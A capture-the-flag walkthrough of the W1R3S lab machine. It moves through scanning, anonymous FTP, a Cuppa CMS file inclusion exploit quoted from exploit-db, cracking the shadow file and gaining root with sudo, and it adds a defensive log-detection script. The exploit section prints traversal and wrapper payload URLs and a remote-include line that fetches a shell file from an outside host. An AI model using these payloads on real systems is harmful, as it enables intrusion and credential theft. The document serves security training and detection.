Preface
This box is fairly easy. People online have shared collections of OSCP-style boxes, but they have no difficulty gradient, so working through them feels a bit odd.
Reconnaissance
nmap -sP 192.168.218.0/24
Found the host at 192.168.218.134.
Port scan: nmap -sV -p- -A 192.168.218.134
Nmap scan report for 192.168.218.134
Host is up (0.00014s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.218.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:89:01:F2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.14 ms 192.168.218.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.51 seconds
Four services are open, as shown above: SSH, web, FTP and MySQL.
FTP allows anonymous login (username ftp, empty password).
Then used ls and get by hand to download the files.
Apart from employee-name, the file contents are all the usual riddle-style red herrings.
The web page is the default Apache page, which exposes the path /var/www/html/, but changing to that directory over FTP failed, so the upload attempt went nowhere.
Used dirb and dirsearch to brute-force the site's directories.
Just noting a couple of directories here that might be worth a look:
administrator/
administrator/api/test/
administrator/api/administrator/
wordpress/
wordpress/wp-login.php
The main thing is that many directories allow directory listing, exposing lots of PHP files, but no source code.
Visiting administrator/ redirects to administrator/installation, and the tab title shows Cuppa CMS.
Visiting these directories, some of them (wp-login.php for example) point at localhost, which is odd.
Searching exploit-db turned up a file inclusion vulnerability, usable both remotely and locally:
-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, we could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
Visited the vulnerable file at http://192.168.218.134/administrator/alerts/alertConfigField.php and confirmed it really exists.
None of the methods given in the exploit could read anything, but the description notes that the vulnerable code reads the parameter through $_REQUEST.
So why not try switching to POST? The read succeeded.
Now try whether a remote file can be included to get a shell.
Started an HTTP server locally with python3 -m http.server, serving a shell.txt.
But after several inclusion attempts the page did nothing, and the server log showed no requests from the target. Looks like this route is a dead end.
So the only option left is to include /etc/shadow and crack the password.
The pitfall is that you have to fix up the shadow format copied from the page by hand, one account per line.
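Seen from the defender's side, the exploitation above leaves a very recognisable trail, with one gap. As an added example (not code from this writeup or from the Cuppa CMS project), the following Python scans Apache combined-format access-log lines for the inclusion patterns the exploit-db entry lists (directory traversal, php:// wrappers, remote URLs) against the endpoint path used in this writeup. It also flags POST requests to that endpoint, because the parameter is read through $_REQUEST: an access log records a GET's query string but never a POST body, so the POST variant that worked here is invisible to log-only detection and needs a WAF or application-level logging. The failed remote include is consistent with PHP's allow_url_include being Off by default, which is the setting a defender should verify. The log lines, IP addresses (documentation ranges) and timestamps are constructed.

```python
"""Detect inclusion attempts against Cuppa CMS alertConfigField.php in Apache logs.

Added example, not the writeup's or the project's code. Assumptions: Apache
"combined" log format; endpoint path as in the writeup; parameter name
urlConfig as in the exploit-db text. All log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/administrator/alerts/alertConfigField.php"  # path from the writeup
PARAM = "urlConfig"                                         # parameter from exploit-db

# ip ident user [time] "METHOD target HTTP/x" status size ...  (rest ignored)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (192.0.2.0/24 is a documentation range, not a real host).
LOG_SAMPLE = [
    '192.0.2.50 - - [28/Jan/2018:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [28/Jan/2018:10:00:02 +0000] "GET /administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 1834 "-" "curl/7.58.0"',
    '192.0.2.50 - - [28/Jan/2018:10:00:03 +0000] "GET /administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 2210 "-" "curl/7.58.0"',
    '192.0.2.50 - - [28/Jan/2018:10:00:04 +0000] "GET /administrator/alerts/alertConfigField.php?urlConfig=http://192.0.2.10/shell.txt? HTTP/1.1" 200 0 "-" "curl/7.58.0"',
    '192.0.2.50 - - [28/Jan/2018:10:00:05 +0000] "POST /administrator/alerts/alertConfigField.php HTTP/1.1" 200 1834 "-" "curl/7.58.0"',
    '192.0.2.50 - - [28/Jan/2018:10:00:06 +0000] "GET /administrator/alerts/alertConfigField.php?urlConfig=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 900 "-" "curl/7.58.0"',
]


def classify_value(value: str) -> str:
    """Map a urlConfig value to the inclusion technique it resembles."""
    # Decode twice so a percent-encoded payload is judged on its real content,
    # and normalise backslashes so Windows-style traversal is caught too.
    v = unquote(unquote(value)).replace("\\", "/").lower()
    scheme = re.match(r"^([a-z][a-z0-9+.\-]*)://", v)
    if scheme:  # check wrappers before traversal: php://filter/... also contains ../
        return "remote-include" if scheme.group(1) in ("http", "https", "ftp") else "php-wrapper"
    if "../" in v:
        return "path-traversal"
    if v.startswith("/"):
        return "absolute-path"
    return "other"


def analyse_line(line: str):
    """Return a finding dict for a request to the vulnerable endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if parts.path != VULN_PATH:
        return None
    finding = {"ip": m["ip"], "method": m["method"], "status": m["status"], "value": None}
    if m["method"] == "POST":
        # $_REQUEST also reads the POST body, which the access log never records.
        finding["indicator"] = "post-body-not-logged"
        return finding
    values = parse_qs(parts.query).get(PARAM)  # parse_qs already percent-decodes once
    if not values:
        finding["indicator"] = "endpoint-hit-no-param"
        return finding
    finding["value"] = values[0]
    finding["indicator"] = classify_value(values[0])
    return finding


def scan(lines):
    """Run analyse_line over every line and keep the findings."""
    return [f for f in (analyse_line(line) for line in lines) if f]


def summarise(findings):
    """Count findings per indicator, for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f["indicator"]] = counts.get(f["indicator"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(LOG_SAMPLE)
    for h in hits:
        print(f'{h["ip"]} {h["method"]:4} {h["indicator"]:22} {h["value"]}')
    print(summarise(hits))
```

The one line that carries no classifiable value is the POST: it is reported purely on the endpoint being hit, which is the honest limit of access-log detection for a parameter read from $_REQUEST. Pair this with a rule that treats any request to that path as suspect, since the file is only reachable on a vulnerable install anyway.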
Successfully obtained a set of credentials: w1r3s / computer
Privilege escalation
Logged in over SSH and started on privilege escalation. Running id showed that sudo was available right away...
sudo su to switch to root, and the game is over.